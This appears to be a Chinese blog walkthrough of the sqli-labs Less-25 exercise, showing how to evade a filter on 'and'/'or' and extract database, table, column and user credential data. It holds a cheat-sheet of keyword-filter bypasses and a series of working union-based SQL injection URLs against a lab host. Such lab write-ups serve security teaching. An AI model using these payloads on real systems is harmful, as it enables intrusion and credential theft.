首页 > 数据库 >sqli-labs less-25 and/or绕过

sqli-labs less-25 and/or绕过

时间:2024-10-13 22:48:37浏览次数:10  
标签:25 http Less 192.168 labs sqli 140.130 id

来到less-25
在这里插入图片描述
我们可以看到下面有提示,Hint: Your Input is Filtered with following result: 说明本关卡有过滤,
构造

http://192.168.140.130/sq/Less-25/?id=1’

页面报错,从报错可以得知闭合方式为',所以

用注释符,发现注释符被过滤了

http://192.168.140.130/sq/Less-25/?id=1’ #
在这里插入图片描述
构造
http://192.168.140.130/sq/Less-25/?id=1’ or ‘1’=‘1
http://192.168.140.130/sq/Less-25/?id=1’ and ‘1’='1

虽然回显正常,但是我们从页面下方的提示可以看到我们的and和or都被过滤了,从和黑测试的角度出发,我们不难猜到,注释符,and,or都被本关过滤,所以先来了解一下and/or的绕过方式,注释符在之前23关已经了解过,不做过多讲解。

And/or绕过

or ——> ||
and ——> &&
xor ——> |
not ——> !

十六进制绕过
or ——> o\x72

大小写绕过
Or
aNd

双写绕过
oorr
anandd

urlencode,ascii(char),hex,unicode编码绕过
一些unicode编码举例:
单引号:’
%u0027 %u02b9 %u02bc
%u02c8 %u2032
%uff07 %c0%27
%c0%a7 %e0%80%a7

关键字内联注释尝试绕所有
/!or/
/!and/

参考自:SQL注入绕过速查表

and绕过

所以在less-25我们对and使用||进行绕过

http://192.168.140.130/sq/Less-25/?id=1’ AND ‘1’='1

发现大小写会被被过滤,使用&&符号,还是被过滤,使用&&的URL编码绕过,成功没有被过滤。

http://192.168.140.130/sq/Less-25/?id=1’ %26%26 ‘1’='1在这里插入图片描述

测试列数

http://192.168.140.130/sq/Less-25/?id=1’ order by 5 %26%26 ‘1’='1

发现因为order中有or被过滤,可以使用双写绕过

http://192.168.140.130/sq/Less-25/?id=1’ oorrder by 5 %26%26 ‘1’='1
没有被过滤,但是无论测试多少列,都没有报错,怀疑不能使用这种方法测试列数

所以可以使用union select来依次尝试

http://192.168.140.130/sq/Less-25/?id=-1’ union select 1,2,3 %26%26 ‘1’='1

发现3的时候回显正常,且暴漏出回显位。确定列数与回显位。

爆数据

接下来就简单了。按照之前的语句直接报数据,不做过多讲解,

  • http://192.168.140.130/sq/Less-25/?id=-1’ union select 1,(select database()),3 %26%26 ‘1’='1
  • 数据库名
  • http://192.168.140.130/sq/Less-25/?id=-1’ union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3 %26%26 ‘1’='1
  • 表名,information中有or字符,要进行双写绕过。
  • http://192.168.140.130/sq/Less-25/?id=-1’ union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() aandnd table_name=‘users’),3 %26%26 ‘1’='1
  • 也要注意加重位置绕过
  • http://192.168.140.130/sq/Less-25/?id=-1’ union select 1,(select group_concat(username,‘-’,passwoorrd) from security.users),3 %26%26 ‘1’='1
  • 数据

大家可以对其他绕过方式也进行尝试,

标签:25,http,Less,192.168,labs,sqli,140.130,id
From: https://blog.csdn.net/wanggonghanfei/article/details/142899429

相关文章

  • 学期2024-2025-1 学号20241424 《计算机基础与程序设计》第4周学习总结
    学期2024-2025-1学号20241424《计算机基础与程序设计》第4周学习总结作业信息|这个作业属于(2024-2025-1-计算机基础与程序设计)||-- |-- ||这个作业要求在(2024-2025-1计算机基础与程序设计第四周作业||这个作业的目标|<写上具体方面>参考上面的学习总结模板,把学习过程通过......
  • sqlite 源码编译,并写一个 sqlite_demo程序。
    环境介绍:ubuntu系统cmake(cmake安装) (可以手动下载源码,编译安装,也可以使用系统最新的cmake安装)  一、下载源码并编译https://github.com/sqlite/sqlite/tree/vesion-3.45.1下载3.45.1的源码 sqlite-vesion-3.45.1.zip 解压 sqlite-vesion-3.45.1到当前目......
  • 024-2025 20241323第三周总结
    这个作业属于https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP这个作业要求https://www.cnblogs.com/rocedu/p/9577842.html#WEEK03• 门电路• 组合电路,逻辑电路• 冯诺依曼结构• CPU,内存,IO管理• 嵌入式系统,并行结构• 物理安全作业正文https://www.cnblogs.com......
  • QD1-P25 CSS 背景
    本节学习:CSS背景属性本节视频https://www.bilibili.com/video/BV1n64y1U7oj?p=25背景颜色​​背景图片不重复​​横向重复​​纵向重复​​双向重复​​背景图片大小400px​​600px​​原图大小​​显示器宽度不够时,显示图片的一部分​​‍‍本......
  • 2024-2025-1 202421310 《计算机基础与程序设计》第3周学习总结
    学期(如2024-2025-1)学号(如:20241300)《计算机基础与程序设计》第X周学习总结作业信息|这个作业属于哪个课程|https://www.cnblogs.com/rocedu/p/9577842.html|这个作业要求在哪里|https://www.cnblogs.com/rocedu/p/9577842.html#WEEK03|这个作业的目标|数字分类与计数法位......
  • 2024-2025-1 20241329 《计算机基础与程序设计》第三周学习总结
    作业信息作业归属课程:https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP作业要求:https://www.cnblogs.com/rocedu/p/9577842.html#WEEK03作业目标:数字分类与计数法、位置计数法、进制转换、模拟数据与数字数据、压缩与解压、数字化、信息安全作业正文:https://www.cnblo......
  • 2024-2025第一学年 20241410苏尚君《计算机基础与程序设计》第三周学习总结
    这个作业属于哪个课程(2024-2025-1-计算机基础与程序设计)这个作业要求在哪里(2024-2025-1计算机基础与程序设计第三周作业这个作业的目标门电路,组合电路,逻辑电路,冯诺依曼结构作业正文教材学习内容总结一、门定义:“门”通常指的是逻辑门(LogicGates),这是构......
  • 2024-2025 20241313刘鸣宇《计算机基础与程序设计》第三周学习总结
    1.阅读《C语言程序设计》,对有疑问的地方寻找AI进行解答2.3.《计算机科学概论》学习总结(1)第二章学习了不同进制(二进制,十进制,八进制,十六进制)之间的转换学习了其他技术系统中的运算规则(2)第三章1.信息与数据的区别:信息是数据的一种2.为何进行数据压缩:网络具有固定的带宽限制,压......
  • 2024-2025-1 20241423 《计算机基础与程序设计》第3周学习总结
    作业信息这个作业属于哪个课程<班级的链接>(如2024-2025-1-计算机基础与程序设计)这个作业要求在哪里2024-2025-1计算机基础与程序设计第三周作业这个作业的目标学习《C语言程序设计》第二章并完成云班课测试。自学《计算机科学概论》第2章,第3章并完成云班课测试......
  • 2024-2025-1 20241312 《计算机基础与程序设计》第3周学习总结
    |这个作业属于哪个课程|https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP|这个作业要求在哪里|https://www.cnblogs.com/rocedu/p/9577842.html#WEEK03|这个作业的目标|数字分类与计数法位置计数法进制转换模拟数据与数字数据压缩与解压数字化信息安全|作业正文|h......